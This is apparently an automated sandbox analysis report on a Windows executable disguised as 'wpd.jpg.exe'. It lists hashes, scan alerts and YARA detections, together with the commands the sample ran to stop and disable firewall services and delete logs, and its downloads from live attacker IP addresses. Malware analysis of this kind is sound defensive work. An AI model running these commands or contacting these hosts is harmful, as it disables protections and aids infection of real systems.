Category | Machine | Started | Completed |
---|---|---|---|
ARCHIVE | s1_win7_x6401 | June 7, 2024, 5:49 p.m. | June 7, 2024, 5:51 p.m. |
Archive wpd.jpg.exe @ sandbox.zip
Summary
Size | 8.4MB |
---|---|
Type | PE32 executable (console) Intel 80386, for MS Windows |
MD5 | 1bfe19a314dd31d6adda302f177c3b7c |
SHA1 | 37fd59aa2c2b77c8757438075138f11eaedf81b8 |
SHA256 | b63ce450e4d34d1cdd727a1a246d38167f45aeacc69d15c6922ef723e49a3cf7 |
SHA512 |
b486b312f809146fbe95f121ea9d7bfc152266e5ca1a178316aafe4ca21e4a80ffa76b5c7e36758d45714439b34f7f6fa6d3ed2a599f64fd7dfe5a23d416a638
|
CRC32 | CD831527 |
ssdeep | 196608:1M6/uTeIz//QEJZe+t6SuqYTFLQmEe2r06+mVWFO5p5adyuFqAHBLgMP:l/YeIzAYe+t1uTJQddQ3Qub |
Yara |
|
-
-
cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im csrs.exe&sc start netprofm&sc config netprofm start= auto&sc start NlaSvc&sc config NlaSvc start= auto
2760-
taskkill.exe taskkill /f /im csrs.exe
2804 -
sc.exe sc start netprofm
2956 -
sc.exe sc config netprofm start= auto
3032 -
sc.exe sc start NlaSvc
940 -
sc.exe sc config NlaSvc start= auto
2100
-
-
cmd.exe C:\Windows\system32\cmd.exe /c net stop WinNsaSrv&sc config WinNsaSrv start= disabled&sc1 stop sharedaccess&sc stop 1MpsSvc&sc config 1MpsSvc start= disabled&del *.log
2244 -
-
taskkill.exe taskkill /im csrs.exe /f
3420
-
-
-
csrs.exe csrs.exe -m 6 -t 200 -l 9999
3588
-
-
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.101:50002 -> 192.168.57.143:1433 | 2001583 | ET SCAN Behavioral Unusual Port 1433 traffic Potential Scan or Infection | Misc activity |
TCP 192.168.56.101:49940 -> 192.168.57.79:445 | 2001569 | ET SCAN Behavioral Unusual Port 445 traffic Potential Scan or Infection | Misc activity |
Suricata TLS
No Suricata TLS
section | xx0 |
section | xx1 |
section | xx2 |
resource name | BIN |
resource name | TXT |
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://104.37.187.182/xpxmr.txt | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://104.37.187.182/ok/wpd.html | ||||||
suspicious_features | Connection to IP address | suspicious_request | GET http://104.37.187.182/wpdmd5.txt | ||||||
suspicious_features | Connection to IP address | suspicious_request | GET http://104.37.187.182/wpdtest.txt | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://104.37.187.182/ver.txt | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://104.37.187.182/shellver.txt |
request | GET http://104.37.187.182/xpxmr.txt |
request | GET http://104.37.187.182/ok/wpd.html |
request | GET http://104.37.187.182/wpdmd5.txt |
request | GET http://104.37.187.182/wpdtest.txt |
request | GET http://104.37.187.182/ver.txt |
request | GET http://104.37.187.182/shellver.txt |
name | BIN | language | LANG_CHINESE | filetype | empty | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00e90a5c | size | 0x0001e059 | ||||||||||||||||||
name | BIN | language | LANG_CHINESE | filetype | empty | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00e90a5c | size | 0x0001e059 | ||||||||||||||||||
name | BIN | language | LANG_CHINESE | filetype | empty | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00e90a5c | size | 0x0001e059 | ||||||||||||||||||
name | BIN | language | LANG_CHINESE | filetype | empty | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00e90a5c | size | 0x0001e059 | ||||||||||||||||||
name | BIN | language | LANG_CHINESE | filetype | empty | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00e90a5c | size | 0x0001e059 | ||||||||||||||||||
name | BIN | language | LANG_CHINESE | filetype | empty | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00e90a5c | size | 0x0001e059 | ||||||||||||||||||
name | BIN | language | LANG_CHINESE | filetype | empty | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00e90a5c | size | 0x0001e059 | ||||||||||||||||||
name | BIN | language | LANG_CHINESE | filetype | empty | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00e90a5c | size | 0x0001e059 | ||||||||||||||||||
name | BIN | language | LANG_CHINESE | filetype | empty | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00e90a5c | size | 0x0001e059 | ||||||||||||||||||
name | BIN | language | LANG_CHINESE | filetype | empty | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00e90a5c | size | 0x0001e059 | ||||||||||||||||||
name | BIN | language | LANG_CHINESE | filetype | empty | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00e90a5c | size | 0x0001e059 | ||||||||||||||||||
name | BIN | language | LANG_CHINESE | filetype | empty | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00e90a5c | size | 0x0001e059 | ||||||||||||||||||
name | TXT | language | LANG_CHINESE | filetype | empty | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00eaeab8 | size | 0x0008d49b | ||||||||||||||||||
name | RT_STRING | language | LANG_CHINESE | filetype | empty | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00f3bf54 | size | 0x00000038 | ||||||||||||||||||
name | RT_VERSION | language | LANG_CHINESE | filetype | COM executable for DOS | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00e0c350 | size | 0x000002b8 |
file | C:\Users\test22\AppData\Local\Temp\_MEI35442\msvcr90.dll |
file | C:\Users\test22\AppData\Local\Temp\_MEI35442\msvcm90.dll |
file | C:\Users\test22\AppData\Local\Temp\_MEI35442\msvcp90.dll |
file | C:\Users\test22\AppData\Local\Temp\_MEI35442\python27.dll |
cmdline | C:\Windows\system32\cmd.exe /c net stop WinNsaSrv&sc config WinNsaSrv start= disabled&sc1 stop sharedaccess&sc stop 1MpsSvc&sc config 1MpsSvc start= disabled&del *.log |
cmdline | C:\Windows\system32\cmd.exe /c taskkill /im csrs.exe /f |
cmdline | C:\Windows\system32\cmd.exe /c taskkill /f /im csrs.exe&sc start netprofm&sc config netprofm start= auto&sc start NlaSvc&sc config NlaSvc start= auto |
file | C:\Users\test22\AppData\Local\Temp\_MEI35442\Crypto.Util._counter.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI35442\Crypto.Cipher._DES3.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI35442\_hashlib.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI35442\cryptography.hazmat.bindings._constant_time.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI35442\msvcr90.dll |
file | C:\Users\test22\AppData\Local\Temp\_MEI35442\_socket.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI35442\select.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI35442\Crypto.Hash._MD4.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI35442\python27.dll |
file | C:\Users\test22\AppData\Local\Temp\_MEI35442\msvcm90.dll |
file | C:\Users\test22\AppData\Local\Temp\_MEI35442\msvcp90.dll |
file | C:\Users\test22\AppData\Local\Temp\_MEI35442\_ssl.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI35442\Crypto.Cipher._DES.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI35442\_cffi_backend.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI35442\Crypto.Random.OSRNG.winrandom.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI35442\pyexpat.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI35442\Crypto.Util.strxor.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI35442\cryptography.hazmat.bindings._openssl.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI35442\Crypto.Cipher._AES.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI35442\Crypto.Hash._SHA256.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI35442\Crypto.Cipher._ARC4.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI35442\bz2.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI35442\_ctypes.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI35442\unicodedata.pyd |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "csrs.exe") |
section | {u'size_of_data': u'0x0085f400', u'virtual_address': u'0x005ac000', u'entropy': 7.92303226230594, u'name': u'xx2', u'virtual_size': u'0x0085f2c0'} | entropy | 7.92303226231 | description | A section with a high entropy has been found | |||||||||
entropy | 0.99953363647 | description | Overall entropy of this PE file is high |
url | https://ssl.pstatic.net/tveta/libs/1287/1287046/6df1cc02334922baa2d4_20200806172035021.jpg |
url | https://ssl.pstatic.net/static/pwe/common/img_use_mobile_version.png |
url | https://fonts.gstatic.com/s/lato/v16/S6uyw4BMUTPHjx4wWA.woff |
url | http://google.com/ |
url | https://s.pstatic.net/dthumb.phinf/?src=%22http%3A%2F%2Fstatic.naver.net%2Fwww%2Fmobile%2Fedit%2F2020%2F0805%2FcropImg_339x222_38528621599152653.jpeg%22 |
url | https://s.pstatic.net/static/www/mobile/edit/2020/0804/cropImg_728x360_38481254551659019.jpeg |
url | https://s.pstatic.net/static/newsstand/2020/logo/light/0604/477.png |
url | https://ssl.pstatic.net/tveta/libs/assets/js/common/min/probe.min.js |
url | https://s.pstatic.net/dthumb.phinf/?src=%22http%3A%2F%2Fstatic1.naver.net%2Fwww%2Fmobile%2Fedit%2F2020%2F0806%2FcropImg_222x145_38626953912837677.png%22 |
url | https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct |
url | https://s.pstatic.net/static/newsstand/up/2021/0420/nsd105139164.png |
url | http://search.naver.com/search.naver?sm=tab_hty.top |
url | http://www.snee.com/xml/xslt/sample.doc |
url | https://ssl.pstatic.net/static/nid/login/img_qrcode_help_desc_2.png |
url | http://www.yceml.net/0559/10408495-1499411010011 |
url | https://s.pstatic.net/static/newsstand/up/2020/0615/nsd10319824.png |
url | https://fonts.gstatic.com/s/catamaran/v7/o-0bIpQoyXQa2RxT7-5B6Ryxs2E_6n1iPHjd5a7dvQ.woff |
url | https://s.pstatic.net/dthumb.phinf/?src=%22http%3A%2F%2Fstatic.naver.net%2Fwww%2Fmobile%2Fedit%2F2020%2F0805%2FcropImg_339x222_38552809772500435.jpeg%22 |
url | https://siape.veta.naver.com/fxshow?su=SU10599 |
url | https://ssl.pstatic.net/static/pwe/nm/b.gif |
url | https://castbox.shopping.naver.com/js/lazyload.js |
url | https://ssl.pstatic.net/tveta/libs/1287/1287125/d641eed9a78997cbf344_20211029092726008.jpg |
url | https://s.pstatic.net/shopping.phinf/20200729_1/2931dd60-1842-4048-a39c-1e3389db4a0e.jpg |
url | https://ssl.pstatic.net/static/pwe/nm/spr_vertical_0d25bb77f8.png |
url | https://s.pstatic.net/static/newsstand/2020/logo/light/0604/042.png |
url | https://s.pstatic.net/static/newsstand/2020/logo/light/0604/955.png |
url | https://s.pstatic.net/static/newsstand/2020/logo/light/0604/056.png |
url | http://www.buzzadnetwork.com/jump/next.php?stamat=m%7CM-4iM-4jaQdHQBH0dEdHP3xP.0e7%2CboDB7XrVJDfRqYwVNhmAc8QRCrIuseXl_bWuTf_latOFYiGEzPpb7ikp5t8RPmTHyMRYDe1i9EJZLC6LSuccW1-YPggnMxkcwVirdNVGfgK3hFUbeKvFvqNv0-u8VxfrNUFB1gFhMN_8GLCn1znxf5_p0FJe0MYRI7nbfyajoqg_H3fvzrjsMsC0vAMYn2un8v5vcBfzwM-DewoZ7WId7geGlrySfAHx5KiJ5Hm90CU%2C |
url | https://s.pstatic.net/shopping.phinf/20200720_22/e2297359-375a-403a-86c5-44ff86c708fc.jpg |
url | https://s.pstatic.net/dthumb.phinf/?src=%22https%3A%2F%2Fs.pstatic.net%2Fstatic%2Fwww%2Fmobile%2Fedit%2F20211029_1095%2Fupload_1635469564183PpB2J.jpg%22 |
url | https://ssl.pstatic.net/tveta/libs/1298/1298853/743c01d46e807a376d99_20200730182507675.png |
url | https://s.pstatic.net/static/newsstand/2020/logo/light/0604/820.png |
url | http://purl.org/rss/1.0/ |
url | https://file-examples-com.github.io/uploads/2017/02/file-sample_1MB.doc |
url | https://s.pstatic.net/static/www/mobile/edit/20211101/cropImg_196x196_77688907167327728.jpeg |
url | https://s.pstatic.net/static/newsstand/2020/logo/light/0604/825.png |
url | https://s.pstatic.net/static/newsstand/2020/logo/light/0604/327.png |
url | https://fonts.gstatic.com/s/catamaran/v7/o-0bIpQoyXQa2RxT7-5B6Ryxs2E_6n1iPHjc5a7dvQ.woff |
url | http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab |
url | https://s.pstatic.net/dthumb.phinf/?src=%22https%3A%2F%2Fs.pstatic.net%2Fstatic%2Fwww%2Fmobile%2Fedit%2F20211029_1095%2Fupload_1635468933633IHO9i.jpg%22 |
url | https://mail.naver.com/js_src/com/nhncorp/mail/write/se2_new/smart_editor2_inputarea_ie8.html?version=20190704 |
url | https://s.pstatic.net/static/newsstand/2020/logo/light/0604/031.png |
url | https://tpc.googlesyndication.com/pagead/images/abg/icon.png |
url | https://googleads.g.doubleclick.net/pagead/drt/si |
url | https://www.gstatic.com/m/images/sy_stars_9.gif |
url | https://phinf.pstatic.net/contact/20190113_166/1547312816315t3o9l_JPEG/image.JPEG?type=s80 |
url | https://www.naver.com |
url | https://s.pstatic.net/shopping.phinf/20211028_9/adf7905c-28ea-4ddf-93b2-aa96dad57752.jpg |
url | https://s.pstatic.net/static/newsstand/2020/logo/light/0604/024.png |
url | https://c.microsoft.com/ms.js |
description | Create a windows service | rule | Create_Service | ||||||
description | Communications over RAW Socket | rule | Network_TCP_Socket | ||||||
description | Communication using DGA | rule | Network_DGA | ||||||
description | Match Windows Http API call | rule | Str_Win32_Http_API | ||||||
description | Take ScreenShot | rule | ScreenShot | ||||||
description | Escalate priviledges | rule | Escalate_priviledges | ||||||
description | Steal credential | rule | local_credential_Steal | ||||||
description | PWS Memory | rule | Generic_PWS_Memory_Zero | ||||||
description | Record Audio | rule | Sniff_Audio | ||||||
description | Communications over HTTP | rule | Network_HTTP | ||||||
description | Communications use DNS | rule | Network_DNS | ||||||
description | Code injection with CreateRemoteThread in a remote process | rule | Code_injection | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerCheck__RemoteAPI | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | DebuggerException__ConsoleCtrl | ||||||
description | (no description) | rule | DebuggerException__SetConsoleCtrl | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | (no description) | rule | Check_Dlls | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Anti-Sandbox checks for ThreatExpert | rule | antisb_threatExpert | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | Affect hook table | rule | win_hook | ||||||
description | File Downloader | rule | Network_Downloader | ||||||
description | Match Windows Inet API call | rule | Str_Win32_Internet_API | ||||||
description | Communications over FTP | rule | Network_FTP | ||||||
description | Run a KeyLogger | rule | KeyLogger | ||||||
description | Communications over P2P network | rule | Network_P2P_Win | ||||||
description | Create a windows service | rule | Create_Service | ||||||
description | Communications over RAW Socket | rule | Network_TCP_Socket | ||||||
description | Communication using DGA | rule | Network_DGA | ||||||
description | Match Windows Http API call | rule | Str_Win32_Http_API | ||||||
description | Take ScreenShot | rule | ScreenShot | ||||||
description | Escalate priviledges | rule | Escalate_priviledges | ||||||
description | Steal credential | rule | local_credential_Steal | ||||||
description | PWS Memory | rule | Generic_PWS_Memory_Zero | ||||||
description | Record Audio | rule | Sniff_Audio | ||||||
description | Communications over HTTP | rule | Network_HTTP | ||||||
description | Communications use DNS | rule | Network_DNS | ||||||
description | Code injection with CreateRemoteThread in a remote process | rule | Code_injection | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerCheck__RemoteAPI | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | DebuggerException__ConsoleCtrl | ||||||
description | (no description) | rule | DebuggerException__SetConsoleCtrl |
cmdline | sc start NlaSvc |
cmdline | C:\Windows\system32\cmd.exe /c net stop WinNsaSrv&sc config WinNsaSrv start= disabled&sc1 stop sharedaccess&sc stop 1MpsSvc&sc config 1MpsSvc start= disabled&del *.log |
cmdline | sc config NlaSvc start= auto |
cmdline | sc start netprofm |
cmdline | sc stop 1MpsSvc |
cmdline | C:\Windows\system32\cmd.exe /c taskkill /im csrs.exe /f |
cmdline | taskkill /im csrs.exe /f |
cmdline | taskkill /f /im csrs.exe |
cmdline | sc config netprofm start= auto |
cmdline | C:\Windows\system32\cmd.exe /c taskkill /f /im csrs.exe&sc start netprofm&sc config netprofm start= auto&sc start NlaSvc&sc config NlaSvc start= auto |
cmdline | sc config WinNsaSrv start= disabled |
cmdline | sc config 1MpsSvc start= disabled |
cmdline | net stop WinNsaSrv |
host | 104.37.187.182 | |||
host | 139.5.177.32 |
description | wpd.jpg.exe tried to sleep 189 seconds, actually delayed analysis time by 189 seconds | |||
description | csrs.exe tried to sleep 1733 seconds, actually delayed analysis time by 1733 seconds |
url | http://104.37.187.182/ok/wpd.html |
url | http://123.123.123.123 |
url | http://104.37.187.182/wpdmd5.txt |
url | http://123.123.123.123:54321/dlr.arm |
url | http://139.5.177.32:9999/ |
url | http://185.47.128.124:8124/m17010.txt |
url | http://139.5.177.32:9999 |
dead_host | 139.5.177.32:9999 |
dead_host | 192.168.56.101:49426 |
dead_host | 192.168.56.101:49235 |
dead_host | 192.168.56.103:49432 |
dead_host | 192.168.56.1:1433 |
dead_host | 192.168.56.1:445 |
dead_host | 192.168.56.101:1433 |
dead_host | 192.168.56.103:1433 |
dead_host | 192.168.56.101:49291 |